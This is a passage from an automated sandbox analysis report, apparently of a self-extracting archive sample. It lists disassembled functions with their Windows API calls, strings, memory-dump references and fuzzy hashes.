Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 8629572e5d6a39539128dfe8e97570f8ab46af6c6234461f6ed7102924d25ab6
Instruction ID: bc519c2932892d51430e382c66782dc355011846b2a63f32b974d34789aad712
Opcode Fuzzy Hash: 8629572e5d6a39539128dfe8e97570f8ab46af6c6234461f6ed7102924d25ab6
Instruction Fuzzy Hash: C4F0283A54070967D612B774BD0AB5B1A698FE2B70F218224F969A23D3FF20880A4165

Function 009FDC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 009FDC47
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 009FDC61
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009FDC72
TranslateMessage.USER32(?), ref: 009FDC7C
DispatchMessageW.USER32(?), ref: 009FDC86
WaitForSingleObject.KERNEL32(?,0000000A), ref: 009FDC91

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: 40579874565ba99729b6b980e89cd779053e11b8bc496e03a5034f17dc201608
Instruction ID: dd264a3869af272a3ded8b9468ddf8b08a9c9c99329094e16d19eaa599f4b873
Opcode Fuzzy Hash: 40579874565ba99729b6b980e89cd779053e11b8bc496e03a5034f17dc201608
Instruction Fuzzy Hash: 4FF03C76A01219BBCF20ABE5EC4CDDF7F7DEF86791B004121B60AD2050D6758646C7A0

Function 009EC0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 009F05DA: _wcslen.LIBCMT ref: 009F05E0

Part of subcall function 009EB92D: _wcsrchr.LIBVCRUNTIME ref: 009EB944

_wcslen.LIBCMT ref: 009EC197
_wcslen.LIBCMT ref: 009EC1DF

Strings

.exe, xrefs: 009EC10B
.sfx, xrefs: 009EC11A
.rar, xrefs: 009EC0E1, 009EC134

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: _wcslen$_wcsrchr
String ID: .exe$.rar$.sfx
API String ID: 3513545583-31770016
Opcode ID: 7f6531aa62e67d23e51b2a44c67539698c3e3566b5427961b956067eda5f9c8b
Instruction ID: b1794b46bef758c94b82bdf3802cc972a3b69b05374eabc13857f396d4ea629f
Opcode Fuzzy Hash: 7f6531aa62e67d23e51b2a44c67539698c3e3566b5427961b956067eda5f9c8b
Instruction Fuzzy Hash: B84139665043D5A5CB37AF759812ABBB3ACFF85744F10090EFAD16B282EB508D83C391

Function 009FCE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 009FCE9D

Part of subcall function 009EB690: _wcslen.LIBCMT ref: 009EB696

_swprintf.LIBCMT ref: 009FCED1

Part of subcall function 009E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009E40A5

SetDlgItemTextW.USER32(?,00000066,00A2946A), ref: 009FCEF1
EndDialog.USER32(?,00000001), ref: 009FCFFE

Strings

%s%s%u, xrefs: 009FCEC6

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
String ID: %s%s%u
API String ID: 110358324-1360425832
Opcode ID: 67863a814d27db795b82b445b3a1266bde2e09d2007fd728417c6c54767d55b6
Instruction ID: 0617e6fcaf629e6affc049c31286cf39cbd7c289e87f8c929da112e8ecb149e1
Opcode Fuzzy Hash: 67863a814d27db795b82b445b3a1266bde2e09d2007fd728417c6c54767d55b6
Instruction Fuzzy Hash: 574180B180025DAADF21EB94DC45BFA77BCEB44704F4084A6FB09E7041EB749A858F61

Function 009EBB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 009EBB27
GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,009EA275,?,?,00000800,?,009EA23A,?,009E755C), ref: 009EBBC5
_wcslen.LIBCMT ref: 009EBC3B

Strings

UNC, xrefs: 009EBBA7
\\?\, xrefs: 009EBB52, 009EBB99, 009EBBF7, 009EBC4E

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: _wcslen$CurrentDirectory
String ID: UNC$\\?\
API String ID: 3341907918-253988292
Opcode ID: aba86f85e82059736d9071ecc5e322908f5ecec75fd0463f3b367da3b7e85e7f
Instruction ID: 2238d01c904d20b6e4c02eb7fe2f1194033ad267ee9a9c778f3da921d7e8ffc6
Opcode Fuzzy Hash: aba86f85e82059736d9071ecc5e322908f5ecec75fd0463f3b367da3b7e85e7f
Instruction Fuzzy Hash: 0F41C432404299B6CF22AF66CC01FEB77BDAF85394F244566F994A3151DBB0EE90CB50

Function 009FB6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 009FB6ED
GetObjectW.GDI32(00000000,00000018,?), ref: 009FB712
DeleteObject.GDI32(00000000), ref: 009FB744
DeleteObject.GDI32(00000000), ref: 009FB767

Part of subcall function 009FA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,009FB73D,00000066), ref: 009FA6D5
Part of subcall function 009FA6C2: SizeofResource.KERNEL32(00000000,?,?,?,009FB73D,00000066), ref: 009FA6EC
Part of subcall function 009FA6C2: LoadResource.KERNEL32(00000000,?,?,?,009FB73D,00000066), ref: 009FA703
Part of subcall function 009FA6C2: LockResource.KERNEL32(00000000,?,?,?,009FB73D,00000066), ref: 009FA712
Part of subcall function 009FA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,009FB73D,00000066), ref: 009FA72D
Part of subcall function 009FA6C2: GlobalLock.KERNEL32(00000000), ref: 009FA73E
Part of subcall function 009FA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 009FA762
Part of subcall function 009FA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 009FA7A7
Part of subcall function 009FA6C2: GlobalUnlock.KERNEL32(00000000), ref: 009FA7C6
Part of subcall function 009FA6C2: GlobalFree.KERNEL32(00000000), ref: 009FA7CD

Strings

], xrefs: 009FB71A

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
String ID: ]
API String ID: 1797374341-3352871620
Opcode ID: c571ad9da974303d23a080c6082a1854632b94b221e3861b97b25338b84c05ea
Instruction ID: 2df21b0b8225c5a3771122e72d24fa5683f7b3e80f7476704b1092f93cd08f85
Opcode Fuzzy Hash: c571ad9da974303d23a080c6082a1854632b94b221e3861b97b25338b84c05ea
Instruction Fuzzy Hash: 4901D27A500219A7CB12BBB49C09B7F7ABD9FC1B52F180111FB04A7291DF668D0647A1

Function 009FD600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 009E1316: GetDlgItem.USER32(00000000,00003021), ref: 009E135A
Part of subcall function 009E1316: SetWindowTextW.USER32(00000000,00A135F4), ref: 009E1370

EndDialog.USER32(?,00000001), ref: 009FD64B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 009FD661
SetDlgItemTextW.USER32(?,00000066,?), ref: 009FD675
SetDlgItemTextW.USER32(?,00000068), ref: 009FD684

Strings

RENAMEDLG, xrefs: 009FD618

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: d89a163bbff99bb8296f7964222c84eb43aa4bb19d19ae35015b8ef11f7f8a6e
Instruction ID: 897d89c95e3b633c46f594c31e2e06d37e72d8db66f5ec9e3fc59167cd3fae04
Opcode Fuzzy Hash: d89a163bbff99bb8296f7964222c84eb43aa4bb19d19ae35015b8ef11f7f8a6e
Instruction Fuzzy Hash: 95012837686218BFD6118FA99D09FB7775EEBDBB02F210510F305E20D4C6A29A068775

Function 00A07E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00A07E24,00000000,?,00A07DC4,00000000,00A1C300,0000000C,00A07F1B,00000000,00000002), ref: 00A07E93
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A07EA6
FreeLibrary.KERNEL32(00000000,?,?,?,00A07E24,00000000,?,00A07DC4,00000000,00A1C300,0000000C,00A07F1B,00000000,00000002), ref: 00A07EC9

Strings

CorExitProcess, xrefs: 00A07E9E
mscoree.dll, xrefs: 00A07E8C

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 38b2ee1de4ce647e7f99a8e1edb8a29980bd68e960a58022b83468e1b6ca182b
Instruction ID: 44f1bb4222cabcc55d147d284f60073d9b58847c3b766e790a31ead986946b66
Opcode Fuzzy Hash: 38b2ee1de4ce647e7f99a8e1edb8a29980bd68e960a58022b83468e1b6ca182b
Instruction Fuzzy Hash: 9CF03131A01218BBDF11DFA0DC09BEEBFB5EF44711F0480A9E805A2190DB749E41CA94

Function 009EF2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 009F081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 009F0836
Part of subcall function 009F081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,009EF2D8,Crypt32.dll,00000000,009EF35C,?,?,009EF33E,?,?,?), ref: 009F0858

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 009EF2E4
GetProcAddress.KERNEL32(00A281C8,CryptUnprotectMemory), ref: 009EF2F4

Strings

CryptProtectMemory, xrefs: 009EF2DE
Crypt32.dll, xrefs: 009EF2CE
CryptUnprotectMemory, xrefs: 009EF2EA

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 6aac92e116db3836aec2bb0fd592df5bf9338836d843f07b86e30456723013c2
Instruction ID: 439d6069cd6177f99b0580b868a32b0bda80ea313df7b947bc10cfe95398c297
Opcode Fuzzy Hash: 6aac92e116db3836aec2bb0fd592df5bf9338836d843f07b86e30456723013c2
Instruction Fuzzy Hash: 2BE0DF32800741AECF21DF759808B817AD87F08740B04C81EE0DAA3240C6B2D8808B00

Function 00A02BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00A02CA1
___AdjustPointer.LIBCMT ref: 00A02CC4
_abort.LIBCMT ref: 00A02D12
___AdjustPointer.LIBCMT ref: 00A02D60

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: d0a237d87854224a5736da7b989c84df3f583e4ec443098693b5a254ef73b7a4
Instruction ID: 615a51db7785ef9759220256450d15fa1dec82ca7afc17d42e1d26c05884f3f9
Opcode Fuzzy Hash: d0a237d87854224a5736da7b989c84df3f583e4ec443098693b5a254ef73b7a4
Instruction Fuzzy Hash: 1951D17260031AAFEB298F14E999BBA77A4FF54310F24452EEC05476E1E731ED80D790

Function 00A0BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00A0BF39
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A0BF5C

Part of subcall function 00A08E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A0CA2C,00000000,?,00A06CBE,?,00000008,?,00A091E0,?,?,?), ref: 00A08E38

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00A0BF82
_free.LIBCMT ref: 00A0BF95
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A0BFA4

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: c123d07982481a06075ad63a846fe9f27e3aefd6d56a358642bab2f4d6fc7e64
Instruction ID: bef629a17df51eb55a5a3acfe5db9598df55be82d44f8da55dee4c5b8b043fb2
Opcode Fuzzy Hash: c123d07982481a06075ad63a846fe9f27e3aefd6d56a358642bab2f4d6fc7e64
Instruction Fuzzy Hash: 1801F77362121A7FAB215BB67D4CCBB6A6DDEC2BA03144229F905C3281EF60CD0285B0

Function 00A09869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00A21030,00000200,00A091AD,00A0617E,?,?,?,?,009ED984,?,?,?,00000004,009ED710,?), ref: 00A0986E
_free.LIBCMT ref: 00A098A3
_free.LIBCMT ref: 00A098CA
SetLastError.KERNEL32(00000000,00A13A34,00000050,00A21030), ref: 00A098D7
SetLastError.KERNEL32(00000000,00A13A34,00000050,00A21030), ref: 00A098E0

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: a26d00f00856bafd1aaf9705fc60771907a24bd02687fac5d1e846a40c5852de
Instruction ID: b3bbc8f1267c43fae3fb481141a130ac14c49b4c7eba8a3366b32f174037b8b8
Opcode Fuzzy Hash: a26d00f00856bafd1aaf9705fc60771907a24bd02687fac5d1e846a40c5852de
Instruction Fuzzy Hash: 9A017D3710070D6BD312A774BD8599B26B9DFD37B07218234F51AA23D3FE308C0A4121

Function 009F0EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 009F11CF: ResetEvent.KERNEL32(?), ref: 009F11E1
Part of subcall function 009F11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 009F11F5

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 009F0F21
CloseHandle.KERNEL32(?,?), ref: 009F0F3B
DeleteCriticalSection.KERNEL32(?), ref: 009F0F54
CloseHandle.KERNEL32(?), ref: 009F0F60
CloseHandle.KERNEL32(?), ref: 009F0F6C

Part of subcall function 009F0FE4: WaitForSingleObject.KERNEL32(?,000000FF,009F1206,?), ref: 009F0FEA
Part of subcall function 009F0FE4: GetLastError.KERNEL32(?), ref: 009F0FF6

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: 29350414b2fd9f7c46691de127e406de695fa6c064417d87ac947f753ee4ca29
Instruction ID: a108569b95cc4b28999b2e5942eac8ec67c2fa87927532ab4b8012b0e66062d3
Opcode Fuzzy Hash: 29350414b2fd9f7c46691de127e406de695fa6c064417d87ac947f753ee4ca29
Instruction Fuzzy Hash: 94015E72100744EFCB229FA4DC84BD6BBEDFB48710F004929F26A92161CB75BA55CB90

Function 00A0C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00A0C817

Part of subcall function 00A08DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00A0C896,00A13A34,00000000,00A13A34,00000000,?,00A0C8BD,00A13A34,00000007,00A13A34,?,00A0CCBA,00A13A34), ref: 00A08DE2
Part of subcall function 00A08DCC: GetLastError.KERNEL32(00A13A34,?,00A0C896,00A13A34,00000000,00A13A34,00000000,?,00A0C8BD,00A13A34,00000007,00A13A34,?,00A0CCBA,00A13A34,00A13A34), ref: 00A08DF4

_free.LIBCMT ref: 00A0C829
_free.LIBCMT ref: 00A0C83B
_free.LIBCMT ref: 00A0C84D
_free.LIBCMT ref: 00A0C85F

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c6d24bbb4207867ecfa542fd448d5b1e827a04b86589e13e478d42566c430c8e
Instruction ID: 904ff2d19548ec8334eef54865811e497437b406e802260eaf0ae8562a6ed355
Opcode Fuzzy Hash: c6d24bbb4207867ecfa542fd448d5b1e827a04b86589e13e478d42566c430c8e
Instruction Fuzzy Hash: 75F09632510209BBC620DBA8F585C4B77E9BB00B207588919F54CD75D2CF74FC80CA5C

Function 009F1FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 009F1FE5
_wcslen.LIBCMT ref: 009F1FF6
_wcslen.LIBCMT ref: 009F2006
_wcslen.LIBCMT ref: 009F2014
CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,009EB371,?,?,00000000,?,?,?), ref: 009F202F

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: _wcslen$CompareString
String ID:
API String ID: 3397213944-0
Opcode ID: 590dfac434ca05e42aba0c9026fe293db493f89aa86fbd968a6d7d438af21bcf
Instruction ID: dd058a1450f966e05981512ba952d0b5a3c29f3cbef821e624c25a5008f4817c
Opcode Fuzzy Hash: 590dfac434ca05e42aba0c9026fe293db493f89aa86fbd968a6d7d438af21bcf
Instruction Fuzzy Hash: 7DF01D37008018BBCF225F51EC09EDA7F6AEB45760B158515F71A5A0A1CB729661DB90

Function 00A08900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00A0891E

Part of subcall function 00A08DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00A0C896,00A13A34,00000000,00A13A34,00000000,?,00A0C8BD,00A13A34,00000007,00A13A34,?,00A0CCBA,00A13A34), ref: 00A08DE2
Part of subcall function 00A08DCC: GetLastError.KERNEL32(00A13A34,?,00A0C896,00A13A34,00000000,00A13A34,00000000,?,00A0C8BD,00A13A34,00000007,00A13A34,?,00A0CCBA,00A13A34,00A13A34), ref: 00A08DF4

